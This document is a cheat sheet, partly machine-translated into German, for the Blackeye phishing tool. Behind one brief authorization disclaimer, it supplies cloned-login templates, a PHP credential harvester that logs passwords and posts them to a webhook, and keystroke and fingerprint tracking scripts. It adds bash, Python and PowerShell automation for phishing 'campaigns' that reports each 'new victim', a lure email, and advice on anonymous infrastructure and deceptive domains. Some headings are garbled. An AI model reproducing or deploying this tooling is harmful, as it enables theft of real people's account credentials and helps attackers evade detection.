Blackeye Phishing Tool Cheat Blatt
Überblick
Blackeye ist ein umfassendes Phishing-Tool, das von thelinuxchoice entwickelt wurde, das 32+ gebrauchsfertige Phishing-Vorlagen für beliebte Websites und Services bietet. Es ist für den schnellen Einsatz von Phishing-Seiten mit minimalem Setup konzipiert, so dass es für Bildungszwecke und autorisierte Penetrationstests beliebt ist. Blackeye beinhaltet automatische Beglaubigung Ernte, Echtzeitüberwachung und Unterstützung für verschiedene Tunneldienste.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Bildungszwecke bestimmt. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install required packages
sudo apt update sudo apt install -y git curl php apache2
Install additional dependencies
sudo apt install -y openssh-server unzip wget
Verify PHP installation
php --version
Start Apache service
sudo systemctl start apache2 sudo systemctl enable apache2 ```_
Installation von GitHub
```bash
Clone Blackeye repository
git clone https://github.com/thelinuxchoice/blackeye.git cd blackeye
Make executable
chmod +x blackeye.sh
Run Blackeye
./blackeye.sh ```_
Manuelle Installation
```bash
Download latest version
wget https://github.com/thelinuxchoice/blackeye/archive/master.zip unzip master.zip cd blackeye-master
Set permissions
chmod +x blackeye.sh
Install dependencies
sudo apt install -y php-cli php-curl php-json ```_
Docker Installation
```bash
Create Dockerfile
cat > Dockerfile << 'EOF' FROM ubuntu:20.04
RUN apt-get update && apt-get install -y \ git \ php \ curl \ apache2 \ openssh-server \ && rm -rf /var/lib/apt/lists/*
WORKDIR /app RUN git clone https://github.com/thelinuxchoice/blackeye.git . RUN chmod +x blackeye.sh
EXPOSE 80 8080
CMD ["./blackeye.sh"] EOF
Build and run
docker build -t blackeye . docker run -it --rm -p 80:80 -p 8080:8080 blackeye ```_
Basisnutzung
Starting Blackeye
```bash
Start Blackeye with default settings
./blackeye.sh
Start with specific port
PORT=8080 ./blackeye.sh
Start with custom domain
DOMAIN=phishing.example.com ./blackeye.sh
Start in background mode
nohup ./blackeye.sh & ```_
Interaktives Menü Navigation
```bash
Blackeye main menu options:
1) Instagram
2) Facebook
3) Snapchat
4) Twitter
5) GitHub
6) Google
7) Origin
8) Yahoo
9) LinkedIn
10) ProtonMail
11) Wordpress
12) Microsoft
13) Netflix
14) PayPal
15) Adobe ID
16) Shopify
17) Messenger
18) GitLab
19) Twitch
20) MySpace
21) Badoo
22) VK
23) Yandex
24) deviantART
25) Wi-Fi
26) DropBox
27) eBay
28) Amazon
29) iCloud
30) Spotify
31) Reddit
32) Adobe
33) Custom
99) Exit
Select template by number
Example: Select 1 for Instagram
```_
Tunneloptionen
```bash
Blackeye tunneling menu:
1) Localhost (Default)
2) Ngrok
3) Cloudflared
4) LocalXpose
Ngrok setup
Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip unzip ngrok-stable-linux-amd64.zip sudo mv ngrok /usr/local/bin/
Authenticate ngrok (requires account)
ngrok authtoken YOUR_NGROK_TOKEN
Cloudflared setup
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb sudo dpkg -i cloudflared-linux-amd64.deb ```_
Verfügbare Vorlagen
Social Media Plattformen
```bash
Instagram (Template 1)
- Login page replica
- Mobile-responsive design
- Credential harvesting
- Session capture
Facebook (Template 2)
- Classic Facebook login
- Mobile and desktop versions
- Multi-language support
- Real-time monitoring
Snapchat (Template 3)
- Snapchat login interface
- Mobile-optimized
- Ghost icon branding
- Quick deployment
Twitter (Template 4)
- Twitter login page
- Blue verification theme
- Character limit simulation
- Tweet-like interface
LinkedIn (Template 9)
- Professional network theme
- Business-focused design
- Career-oriented content
- Professional branding
```_
Email und Cloud Services
```bash
Google (Template 6)
- Google account login
- Gmail integration
- Google services branding
- Multi-factor auth simulation
Yahoo (Template 8)
- Yahoo Mail login
- Classic Yahoo design
- Email-focused interface
- News integration
ProtonMail (Template 10)
- Secure email branding
- Privacy-focused design
- Encryption messaging
- Security-conscious users
Microsoft (Template 12)
- Office 365 login
- Outlook integration
- Business productivity theme
- Enterprise branding
iCloud (Template 29)
- Apple iCloud login
- iOS design elements
- Apple branding
- Device synchronization theme
```_
Beruf und Entwicklung
```bash
GitHub (Template 5)
- Developer-focused design
- Code repository theme
- Git integration appearance
- Open source branding
GitLab (Template 18)
- DevOps platform design
- CI/CD pipeline theme
- Enterprise development
- Version control focus
Adobe ID (Template 15)
- Creative Cloud branding
- Designer-focused interface
- Subscription model theme
- Creative professional targeting
Wordpress (Template 11)
- Content management theme
- Blogger-focused design
- Publishing platform
- Website creation focus
```_
Unterhaltung und Gaming
```bash
Netflix (Template 13)
- Streaming service design
- Entertainment branding
- Subscription interface
- Movie/TV show theme
Spotify (Template 30)
- Music streaming design
- Audio-focused branding
- Playlist interface
- Music discovery theme
Twitch (Template 19)
- Gaming platform design
- Streaming interface
- Gamer-focused branding
- Live content theme
Origin (Template 7)
- Gaming platform
- EA Games branding
- Game library interface
- Digital distribution
```_
E-Commerce und Finanzen
```bash
PayPal (Template 14)
- Financial service design
- Payment processing theme
- Security-focused branding
- Transaction interface
Amazon (Template 28)
- E-commerce platform
- Shopping interface
- Product catalog design
- Marketplace branding
eBay (Template 27)
- Auction platform design
- Bidding interface
- Seller/buyer theme
- Marketplace focus
Shopify (Template 16)
- E-commerce creation
- Store management theme
- Business-focused design
- Merchant targeting
```_
Benutzerdefinierte Vorlage Erstellung
Vorlagenstruktur
```bash
Blackeye template directory structure
templates/ ├── custom/ │ ├── index.html │ ├── login.php │ ├── style.css │ ├── script.js │ └── images/ │ ├── logo.png │ └── background.jpg ```_
Benutzerdefinierte HTML-Vorlage
```html
```_
PHP Backend Script
```php
$user_agent, 'ip_address' => $ip, 'timestamp' => $timestamp, 'referer' => $_SERVER['HTTP_REFERER'] ?? '', 'accept_language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 'accept_encoding' => $_SERVER['HTTP_ACCEPT_ENCODING'] ?? '' ]; // Prepare data for logging $captured_data = [ 'credentials' => [ 'email' => $email, 'password' => $password, 'remember' => $remember ], 'browser_info' => $browser_info, 'additional_data' => [ 'screen_resolution' => $_POST['screen_resolution'] ?? '', 'timezone' => $_POST['timezone'] ?? '', 'plugins' => $_POST['plugins'] ?? '' ] ]; // Log to file $log_file = 'captured_data.txt'; $log_entry = date('Y-m-d H:i:s') . " - " . $ip . " - " . $email . " - " . $password . "\n"; file_put_contents($log_file, $log_entry, FILE_APPEND|LOCK_EX); // Log detailed JSON data $json_file = 'captured_data.json'; $json_data = json_encode($captured_data, JSON_PRETTY_PRINT) . "\n"; file_put_contents($json_file, $json_data, FILE_APPEND|LOCK_EX); // Send notification (optional) if (function_exists('curl_init')) \\\\{ $webhook_url = 'https://your-webhook-url.com/notify'; $notification_data = [ 'text' => "New Blackeye capture from $ip", 'data' => $captured_data ]; $ch = curl_init($webhook_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($notification_data)); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); \\\\} // Redirect to legitimate site $redirect_url = 'https://legitimate-site.com'; header("Location: $redirect_url"); exit(); ?>```_
CSS Styling
```css / templates/custom/style.css /
- \\{ margin: 0; padding: 0; box-sizing: border-box; \\}
body \\{ font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; align-items: center; justify-content: center; \\}
.container \\{ width: 100%; max-width: 400px; padding: 20px; \\}
.login-box \\{ background: white; border-radius: 10px; padding: 40px; box-shadow: 0 15px 35px rgba(0, 0, 0, 0.1); text-align: center; \\}
.logo img \\{ width: 80px; height: 80px; margin-bottom: 20px; \\}
h2 \\{ color: #333; margin-bottom: 30px; font-weight: 600; \\}
.input-group \\{ margin-bottom: 20px; text-align: left; \\}
.input-group label \\{ display: block; margin-bottom: 5px; color: #555; font-weight: 500; \\}
.input-group input \\{ width: 100%; padding: 12px; border: 2px solid #e1e5e9; border-radius: 6px; font-size: 16px; transition: border-color 0.3s; \\}
.input-group input:focus \\{ outline: none; border-color: #667eea; \\}
.checkbox-group \\{ display: flex; align-items: center; margin-bottom: 20px; text-align: left; \\}
.checkbox-group input \\{ margin-right: 8px; \\}
.login-btn \\{ width: 100%; padding: 12px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: 600; cursor: pointer; transition: transform 0.2s; \\}
.login-btn:hover \\{ transform: translateY(-2px); \\}
.links \\{ margin-top: 20px; display: flex; justify-content: space-between; \\}
.links a \\{ color: #667eea; text-decoration: none; font-size: 14px; \\}
.links a:hover \\{ text-decoration: underline; \\}
/ Mobile responsiveness / @media (max-width: 480px) \\{ .container \\{ padding: 10px; \\}
.login-box \\\\{
padding: 30px 20px;
\\\\}
.links \\\\{
flex-direction: column;
gap: 10px;
\\\\}
\\} ```_
JavaScript Enhancement
```javascript // templates/custom/script.js
// Collect additional browser information function collectBrowserInfo() \\{ const info = \\{ screen_resolution: screen.width + 'x' + screen.height, timezone: Intl.DateTimeFormat().resolvedOptions().timeZone, language: navigator.language, platform: navigator.platform, cookie_enabled: navigator.cookieEnabled, online: navigator.onLine, plugins: Array.from(navigator.plugins).map(p => p.name).join(', ') \\};
// Add hidden inputs to form
const form = document.getElementById('loginForm');
Object.keys(info).forEach(key => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = info[key];
form.appendChild(input);
\\\\});
\\}
// Collect additional information on link clicks function collectAdditionalInfo() \\{ const additionalInfo = \\{ timestamp: new Date().toISOString(), page_url: window.location.href, referrer: document.referrer, viewport: window.innerWidth + 'x' + window.innerHeight \\};
// Send to server
fetch('collect_info.php', \\\\{
method: 'POST',
headers: \\\\{
'Content-Type': 'application/json',
\\\\},
body: JSON.stringify(additionalInfo)
\\\\}).catch(err => console.log('Info collection failed'));
\\}
// Form validation and enhancement document.addEventListener('DOMContentLoaded', function() \\{ collectBrowserInfo();
const form = document.getElementById('loginForm');
const emailInput = document.getElementById('email');
const passwordInput = document.getElementById('password');
// Real-time validation
emailInput.addEventListener('input', function() \\\\{
const email = this.value;
if (email.includes('@')) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
passwordInput.addEventListener('input', function() \\\\{
const password = this.value;
if (password.length >= 6) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
// Form submission tracking
form.addEventListener('submit', function(e) \\\\{
// Track submission attempt
const submissionData = \\\\{
timestamp: new Date().toISOString(),
email_length: emailInput.value.length,
password_length: passwordInput.value.length,
time_on_page: Date.now() - window.performance.timing.navigationStart
\\\\};
// Add to form
Object.keys(submissionData).forEach(key => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = submissionData[key];
form.appendChild(input);
\\\\});
\\\\});
\\});
// Mouse movement tracking (optional) let mouseMovements = []; document.addEventListener('mousemove', function(e) \\{ mouseMovements.push(\\{ x: e.clientX, y: e.clientY, timestamp: Date.now() \\});
// Keep only last 50 movements
if (mouseMovements.length > 50) \\\\{
mouseMovements = mouseMovements.slice(-50);
\\\\}
\\});
// Keystroke timing (optional) let keystrokeTimings = []; document.addEventListener('keydown', function(e) \\{ keystrokeTimings.push(\\{ key: e.key, timestamp: Date.now(), | target: e.target.name | | e.target.id | \\}); \\}); ```_
Automatisierung und Schrift
Bash Automation Script
```bash
!/bin/bash
Blackeye automation script
BLACKEYE_DIR="/path/to/blackeye" TEMPLATE_NUMBER="1" # Instagram TUNNEL_OPTION="2" # Ngrok DURATION="3600" # 1 hour
Function to start Blackeye
start_blackeye() \\{ echo "[+] Starting Blackeye automation..." cd "$BLACKEYE_DIR"
# Create expect script for automation
cat > blackeye_auto.exp << 'EOF'
!/usr/bin/expect -f
set timeout 30 set template [lindex $argv 0] set tunnel [lindex $argv 1]
spawn ./blackeye.sh
Select template
expect "Choose an option:" send "$template\r"
Select tunneling option
expect "Choose an option:" send "$tunnel\r"
Wait for setup completion
expect "Press Ctrl+C to stop"
Keep running
interact EOF
chmod +x blackeye_auto.exp
# Run automated setup
./blackeye_auto.exp "$TEMPLATE_NUMBER" "$TUNNEL_OPTION" &
BLACKEYE_PID=$!
echo "[+] Blackeye started with PID: $BLACKEYE_PID"
echo "[+] Template: $TEMPLATE_NUMBER, Tunnel: $TUNNEL_OPTION"
\\}
Function to monitor captures
monitor_captures() \\{ echo "[+] Starting capture monitoring..."
while true; do
if [ -f "captured_data.txt" ]; then
CAPTURE_COUNT=$(wc -l < captured_data.txt)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest captures
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "captures_backup_$TIMESTAMP.txt"
if [ -f "captured_data.json" ]; then
cp captured_data.json "captures_detailed_$TIMESTAMP.json"
fi
echo "[+] Captures backed up with timestamp: $TIMESTAMP"
fi
fi
sleep 30
done
\\}
Function to send notifications
send_notification() \\{ local message="$1" local webhook_url="https://your-webhook-url.com/notify"
if command -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"$message\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\}
Function to cleanup
cleanup() \\{ echo "[+] Cleaning up..."
if [ -n "$BLACKEYE_PID" ]; then
kill "$BLACKEYE_PID" 2>/dev/null
echo "[+] Blackeye stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Monitoring stopped"
fi
# Final backup
if [ -f "captured_data.txt" ]; then
FINAL_TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "final_captures_$FINAL_TIMESTAMP.txt"
echo "[+] Final backup created: final_captures_$FINAL_TIMESTAMP.txt"
fi
exit 0
\\}
Set trap for cleanup
trap cleanup SIGINT SIGTERM
Main execution
main() \\{ echo "[+] Blackeye Automation Script" echo "[+] Template: $TEMPLATE_NUMBER" echo "[+] Tunnel: $TUNNEL_OPTION" echo "[+] Duration: $DURATION seconds"
# Check dependencies
if ! command -v expect &> /dev/null; then
echo "[-] expect is required. Install with: sudo apt install expect"
exit 1
fi
# Start Blackeye
start_blackeye
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Send start notification
send_notification "Blackeye automation started - Template: $TEMPLATE_NUMBER"
# Run for specified duration
echo "[+] Running for $DURATION seconds..."
sleep "$DURATION"
# Send completion notification
send_notification "Blackeye automation completed"
cleanup
\\}
Execute main function
main ```_
Python Automation Script
```python
!/usr/bin/env python3
Blackeye Python automation script
import subprocess import time import json import os import requests import threading from datetime import datetime
class BlackeyeAutomation: def init(self, blackeye_dir, template_number=1, tunnel_option=2): self.blackeye_dir = blackeye_dir self.template_number = template_number self.tunnel_option = tunnel_option self.process = None self.monitoring = False self.webhook_url = "https://your-webhook-url.com/notify"
def start_blackeye(self):
"""Start Blackeye with automated input"""
try:
os.chdir(self.blackeye_dir)
# Create expect script for automation
expect_script = f"""#!/usr/bin/expect -f
set timeout 30
spawn ./blackeye.sh
expect "Choose an option:" send "\\{self.template_number\\}\r"
expect "Choose an option:" send "\\{self.tunnel_option\\}\r"
expect "Press Ctrl+C to stop" interact """
with open('blackeye_auto.exp', 'w') as f:
f.write(expect_script)
os.chmod('blackeye_auto.exp', 0o755)
# Start Blackeye
self.process = subprocess.Popen(['./blackeye_auto.exp'])
print(f"[+] Blackeye started with PID: \\\\{self.process.pid\\\\}")
print(f"[+] Template: \\\\{self.template_number\\\\}, Tunnel: \\\\{self.tunnel_option\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Blackeye: \\\\{e\\\\}")
return False
def monitor_captures(self):
"""Monitor captured data files"""
self.monitoring = True
last_count = 0
print("[+] Starting capture monitoring...")
while self.monitoring:
try:
if os.path.exists('captured_data.txt'):
with open('captured_data.txt', 'r') as f:
lines = f.readlines()
current_count = len(lines)
if current_count > last_count:
new_captures = current_count - last_count
print(f"[+] \\\\{new_captures\\\\} new capture(s) detected")
# Process new captures
for i in range(last_count, current_count):
if i < len(lines):
self.process_capture(lines[i].strip())
last_count = current_count
# Backup captures
self.backup_captures()
time.sleep(10)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(30)
def process_capture(self, capture_line):
"""Process individual capture"""
try:
# Parse capture line (format: timestamp - ip - email - password)
parts = capture_line.split(' - ')
if len(parts) >= 4:
timestamp, ip, email, password = parts[:4]
print(f"[+] New victim: \\\\{ip\\\\}")
print(f" Email: \\\\{email\\\\}")
print(f" Password: \\\\{'*' * len(password)\\\\}")
print(f" Time: \\\\{timestamp\\\\}")
# Send notification
self.send_notification(\\\\{
'timestamp': timestamp,
'ip': ip,
'email': email,
'password_length': len(password)
\\\\})
except Exception as e:
print(f"[-] Error processing capture: \\\\{e\\\\}")
def backup_captures(self):
"""Backup captured data"""
try:
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# Backup text file
if os.path.exists('captured_data.txt'):
backup_file = f"captures_backup_\\\\{timestamp\\\\}.txt"
subprocess.run(['cp', 'captured_data.txt', backup_file])
print(f"[+] Text backup created: \\\\{backup_file\\\\}")
# Backup JSON file
if os.path.exists('captured_data.json'):
backup_file = f"captures_detailed_\\\\{timestamp\\\\}.json"
subprocess.run(['cp', 'captured_data.json', backup_file])
print(f"[+] JSON backup created: \\\\{backup_file\\\\}")
except Exception as e:
print(f"[-] Backup error: \\\\{e\\\\}")
def send_notification(self, capture_data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 New Blackeye Capture",
'capture': capture_data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def analyze_captures(self):
"""Analyze captured data"""
try:
if not os.path.exists('captured_data.json'):
print("[-] No JSON data file found")
return
with open('captured_data.json', 'r') as f:
data = [json.loads(line) for line in f if line.strip()]
if not data:
print("[-] No capture data found")
return
# Basic analysis
total_captures = len(data)
unique_ips = len(set(item['browser_info']['ip_address'] for item in data))
# Browser analysis
browsers = \\\\{\\\\}
for item in data:
ua = item['browser_info']['user_agent']
if 'Chrome' in ua:
browsers['Chrome'] = browsers.get('Chrome', 0) + 1
elif 'Firefox' in ua:
browsers['Firefox'] = browsers.get('Firefox', 0) + 1
elif 'Safari' in ua:
browsers['Safari'] = browsers.get('Safari', 0) + 1
else:
browsers['Other'] = browsers.get('Other', 0) + 1
# Generate report
report = \\\\{
'total_captures': total_captures,
'unique_ips': unique_ips,
'browser_distribution': browsers,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save report
with open('analysis_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Analysis complete:")
print(f" Total captures: \\\\{total_captures\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f" Browser distribution: \\\\{browsers\\\\}")
print(f"[+] Report saved to: analysis_report.json")
except Exception as e:
print(f"[-] Analysis error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1):
"""Run complete automated campaign"""
print("[+] Starting Blackeye automation campaign...")
# Start Blackeye
if not self.start_blackeye():
return False
# Start monitoring in background thread
monitor_thread = threading.Thread(target=self.monitor_captures)
monitor_thread.daemon = True
monitor_thread.start()
# Send start notification
self.send_notification(\\\\{
'message': 'Blackeye campaign started',
'template': self.template_number,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Final analysis
self.analyze_captures()
# Send completion notification
self.send_notification(\\\\{
'message': 'Blackeye campaign completed',
'template': self.template_number
\\\\})
# Cleanup
self.cleanup()
print("[+] Campaign completed successfully")
return True
def cleanup(self):
"""Cleanup processes and files"""
try:
if self.process and self.process.poll() is None:
self.process.terminate()
self.process.wait(timeout=10)
print("[+] Blackeye process terminated")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists('captured_data.txt'):
final_backup = f"final_captures_\\\\{timestamp\\\\}.txt"
subprocess.run(['cp', 'captured_data.txt', final_backup])
print(f"[+] Final backup created: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
Usage example
def main(): # Configuration blackeye_dir = "/path/to/blackeye" template_number = 1 # Instagram tunnel_option = 2 # Ngrok duration_hours = 1
# Create automation instance
automation = BlackeyeAutomation(blackeye_dir, template_number, tunnel_option)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours)
if success:
print("[+] Automation completed successfully")
else:
print("[-] Automation failed")
if name == "main": main() ```_
PowerShell Automation
```powershell
Blackeye PowerShell automation script
param( [string]$BlackeyePath = "C:\Tools\blackeye", [int]$TemplateNumber = 1, [int]$TunnelOption = 2, [int]$DurationMinutes = 60 )
function Start-BlackeyeAutomation \\{ param( [string]$Path, [int]$Template, [int]$Tunnel )
Write-Host "[+] Starting Blackeye automation..." -ForegroundColor Green
Set-Location $Path
# Create automation script
$automationScript = @"
!/usr/bin/expect -f
set timeout 30
spawn ./blackeye.sh
expect "Choose an option:" send "$Template\r"
expect "Choose an option:" send "$Tunnel\r"
expect "Press Ctrl+C to stop" interact "@
$automationScript|Out-File -FilePath "blackeye_auto.exp" -Encoding ASCII
# Start process (requires WSL or Linux environment)
try \\\\{
$process = Start-Process -FilePath "bash" -ArgumentList @("blackeye_auto.exp") -PassThru
Write-Host "[+] Blackeye started with PID: $($process.Id)" -ForegroundColor Green
return $process
\\\\}
catch \\\\{
Write-Host "[-] Failed to start Blackeye: $_" -ForegroundColor Red
return $null
\\\\}
\\}
function Monitor-Captures \\{ param( [string]$Path, [int]$DurationMinutes )
Write-Host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCount = 0
while ((Get-Date) -lt $endTime) \\\\{
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$lines = Get-Content $captureFile
$currentCount = $lines.Count
if ($currentCount -gt $lastCount) \\\\{
$newCaptures = $currentCount - $lastCount
Write-Host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Process new captures
for ($i = $lastCount; $i -lt $currentCount; $i++) \\\\{
if ($i -lt $lines.Count) \\\\{
Process-Capture -CaptureData $lines[$i]
\\\\}
\\\\}
$lastCount = $currentCount
# Backup captures
Backup-Captures -Path $Path
\\\\}
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-Host "[+] Monitoring completed" -ForegroundColor Green
\\}
function Process-Capture \\{ param([string]$CaptureData)
try \\\\{
# Parse capture data (format: timestamp - ip - email - password)
$parts = $CaptureData -split ' - '
if ($parts.Count -ge 4) \\\\{
$timestamp = $parts[0]
$ip = $parts[1]
$email = $parts[2]
$password = $parts[3]
Write-Host "[+] New victim: $ip" -ForegroundColor Cyan
Write-Host " Email: $email" -ForegroundColor Cyan
Write-Host " Password: $('*' * $password.Length)" -ForegroundColor Cyan
Write-Host " Time: $timestamp" -ForegroundColor Cyan
# Send notification
Send-Notification -Data @\\\\{
timestamp = $timestamp
ip = $ip
email = $email
password_length = $password.Length
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error processing capture: $_" -ForegroundColor Red
\\\\}
\\}
function Backup-Captures \\{ param([string]$Path)
try \\\\{
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
# Backup text file
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$backupFile = Join-Path $Path "captures_backup_$timestamp.txt"
Copy-Item $captureFile $backupFile
Write-Host "[+] Text backup created: $backupFile" -ForegroundColor Green
\\\\}
# Backup JSON file
$jsonFile = Join-Path $Path "captured_data.json"
if (Test-Path $jsonFile) \\\\{
$backupFile = Join-Path $Path "captures_detailed_$timestamp.json"
Copy-Item $jsonFile $backupFile
Write-Host "[+] JSON backup created: $backupFile" -ForegroundColor Green
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Backup error: $_" -ForegroundColor Red
\\\\}
\\}
function Send-Notification \\{ param([hashtable]$Data)
$webhookUrl = "https://your-webhook-url.com/notify"
$payload = @\\\\{
text = "🎣 New Blackeye Capture"
capture = $Data
\\\\}|ConvertTo-Json
try \\\\{
$response = Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
Write-Host "[+] Notification sent successfully" -ForegroundColor Green
\\\\}
catch \\\\{
Write-Host "[-] Notification failed: $_" -ForegroundColor Red
\\\\}
\\}
function Stop-BlackeyeProcess \\{ param([System.Diagnostics.Process]$Process)
if ($Process -and !$Process.HasExited) \\\\{
$Process.Kill()
Write-Host "[+] Blackeye process stopped" -ForegroundColor Green
\\\\}
\\}
Main execution
try \\{ Write-Host "[+] Blackeye PowerShell Automation" -ForegroundColor Cyan Write-Host "[+] Template: $TemplateNumber" -ForegroundColor Cyan Write-Host "[+] Tunnel: $TunnelOption" -ForegroundColor Cyan Write-Host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start Blackeye
$blackeyeProcess = Start-BlackeyeAutomation -Path $BlackeyePath -Template $TemplateNumber -Tunnel $TunnelOption
if ($blackeyeProcess) \\\\{
# Monitor captures
Monitor-Captures -Path $BlackeyePath -DurationMinutes $DurationMinutes
# Stop process
Stop-BlackeyeProcess -Process $blackeyeProcess
\\\\}
\\} catch \\{ Write-Host "[-] Script error: $" -ForegroundColor Red \\} finally \\{ Write-Host "[+] Script completed" -ForegroundColor Green \\} ```
Integration mit anderen Tools
Ngrok Integration
```bash
Setup ngrok for public access
Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip unzip ngrok-stable-linux-amd64.zip sudo mv ngrok /usr/local/bin/
Authenticate with ngrok
ngrok authtoken YOUR_NGROK_TOKEN
Start ngrok tunnel
ngrok http 80
Get public URL
curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url' ```_
Apache/Nginx Integration
```bash
Apache virtual host configuration
sudo tee /etc/apache2/sites-available/blackeye.conf << 'EOF'
<Directory /path/to/blackeye/templates/selected>
AllowOverride All
Require all granted
</Directory>
ErrorLog $\\\\{APACHE_LOG_DIR\\\\}/blackeye_error.log
CustomLog $\\\\{APACHE_LOG_DIR\\\\}/blackeye_access.log combined
EOF
Enable site
sudo a2ensite blackeye.conf sudo systemctl reload apache2
Nginx configuration
sudo tee /etc/nginx/sites-available/blackeye << 'EOF' server \\{ listen 80; server_name phishing.example.com; root /path/to/blackeye/templates/selected; index index.html index.php;
location ~ \.php$ \\\\{
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
\\\\}
access_log /var/log/nginx/blackeye_access.log;
error_log /var/log/nginx/blackeye_error.log;
\\} EOF
Enable site
sudo ln -s /etc/nginx/sites-available/blackeye /etc/nginx/sites-enabled/ sudo systemctl reload nginx ```_
GoPhys Integration
```python
Integrate Blackeye with GoPhish for email delivery
import requests import json
def create_gophish_campaign_with_blackeye(blackeye_url): """Create GoPhish campaign using Blackeye URL"""
gophish_api_url = "http://localhost:3333/api"
api_key = "your_gophish_api_key"
headers = \\\\{
'Authorization': f'Bearer \\\\{api_key\\\\}',
'Content-Type': 'application/json'
\\\\}
# Create email template
template_data = \\\\{
"name": "Blackeye Social Media Campaign",
"subject": "Account Security Alert",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected suspicious activity on your account.</p>
<p>Please verify your identity immediately:</p>
<p><a href="\\\\{blackeye_url\\\\}" style="background-color: #007bff; color: white; padding: 10px 20px; text-decoration: none;">Verify Account</a></p>
</body>
</html>
""",
"text": f"Please verify your account: \\\\{blackeye_url\\\\}"
\\\\}
# Create campaign
campaign_data = \\\\{
"name": "Blackeye Integration Campaign",
"template": template_data,
"url": blackeye_url,
"groups": [\\\\{"name": "Target Group"\\\\}]
\\\\}
response = requests.post(
f"\\\\{gophish_api_url\\\\}/campaigns",
headers=headers,
json=campaign_data
)
return response.json()
Usage
blackeye_url = "https://your-ngrok-url.ngrok.io" campaign = create_gophish_campaign_with_blackeye(blackeye_url) print(f"Campaign created: \\{campaign\\}") ```_
Operationelle Sicherheit
Sicherheit der Infrastruktur
```bash
Use VPS with anonymous payment
Setup through Tor/VPN
Use legitimate domain names
Implement SSL certificates
Example secure deployment
1. Purchase VPS with cryptocurrency
2. Access through Tor browser
3. Register domain with privacy protection
4. Setup Let's Encrypt SSL
5. Configure proper logging
```_
Domain und SSL Setup
```bash
Register legitimate-looking domain
Example: account-security-verification.com
Setup Let's Encrypt SSL
sudo apt install certbot python3-certbot-apache sudo certbot --apache -d your-domain.com
Or manual certificate
sudo certbot certonly --manual -d your-domain.com ```_
Verkehrsobfukation
```bash
Use CDN services
Implement realistic timing delays
Use common ports (80, 443)
Mimic legitimate traffic patterns
Example CloudFlare setup
1. Add domain to CloudFlare
2. Configure DNS records
3. Enable proxy (orange cloud)
4. Configure security settings
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Permission denied
